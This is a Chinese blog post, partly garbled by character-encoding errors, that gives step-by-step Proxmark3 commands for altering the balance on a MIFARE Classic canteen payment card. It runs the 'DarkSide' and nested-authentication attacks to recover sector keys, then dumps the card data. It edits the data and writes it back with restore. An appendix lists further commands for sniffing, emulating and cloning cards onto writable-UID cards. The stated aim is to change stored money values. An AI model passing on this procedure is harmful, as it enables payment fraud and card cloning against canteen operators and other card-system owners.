proxmark3之改飯卡金額

對于無線射頻卡RFID小弟有所研究今日分享一篇關于修改飯卡金額的文章

如果對ID,IC卡還不是很了解先看看raidwar的文章把,驅動什么的請自行百度

低俗文章之傻傻分不清楚的ic和id卡

以及命令幫助

使用Proxmark3進行MIFARE Classic卡的安全測試

以及數(shù)據(jù)分析

RFID之M1卡數(shù)據(jù)分析

下面進入正題

首先

驅動裝好之后可以看到設備管理器中查看 發(fā)現(xiàn)proxmark3使用是COM5端口

proxmark3.exe COM5

hw tune

成功后如下顯示

此時講自己的高頻卡放上去然后直接使用命令

hf mf mifare

如果


找到 validkey 則直接使用命令:?

必須知道一個正確的Key方可進行相關的操作

hf mf nested 1 0 A ffffffffffff

基于驗證漏洞進行全卡區(qū)域Key破解?

如果結果為

則 ? 再次進行漏洞循環(huán)破解

hf mf mifare 524bb6a2?

直到找到正確密碼為止(顯示Found valid key)

找到密碼后使用(測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區(qū)Keys)

hf mf nested 1 0 A ffffffffffff d

導出密碼二進制文件,接著使用

hf mf dump

dump數(shù)據(jù)到bin文件 后分析修改數(shù)據(jù)后再次導入

使用命令以二進制方式恢復數(shù)據(jù)到空白的MIFARE classic卡

hf mf restore

完成


附錄

hf mf (MIFARE卡的相關命令...)

help顯示幫助

dbg設置默認調試模式

rdbl讀取MIFARE classic卡的區(qū)塊數(shù)據(jù)

rdsc讀取MIFARE classic卡的扇區(qū)數(shù)據(jù)

dump導出MIFARE classic卡的數(shù)據(jù)到二進制文件

restore從二進制文件恢復數(shù)據(jù)到空白的MIFARE classic卡

wrbl改寫MIFARE classic卡的區(qū)塊數(shù)據(jù)

chk測試MIFARE classic卡的各個區(qū)塊KEY A/B

mifare基于PRNG漏洞,執(zhí)行mifare “DarkSide”攻擊操作

nested測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區(qū)Keys

sniff嗅卡片與讀寫器之間的通訊(等同于hf 14a snoop)

sim模擬一個MIFARE卡片

eclr清除仿真內存的各區(qū)塊數(shù)據(jù)

eget獲取仿真內存的各區(qū)塊數(shù)據(jù)

eset設置仿真內存的各區(qū)塊數(shù)據(jù)

eload從導出的文件加載仿真數(shù)據(jù)

esave導出保存仿真數(shù)據(jù)到文件

ecfill利用仿真器的keys來填補仿真內存

ekeyprn打印輸出仿真內存中的keys

csetuid直接設置可改UID卡的UID

csetblk把對應區(qū)塊數(shù)據(jù)寫入UID卡

cgetblk讀取UID卡對應區(qū)塊數(shù)據(jù)

cgetsc讀取UID卡對應扇區(qū)數(shù)據(jù)

cload寫入dump數(shù)據(jù)到UID卡。注意

csave保存UID卡數(shù)據(jù)到文件或者仿真內存

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容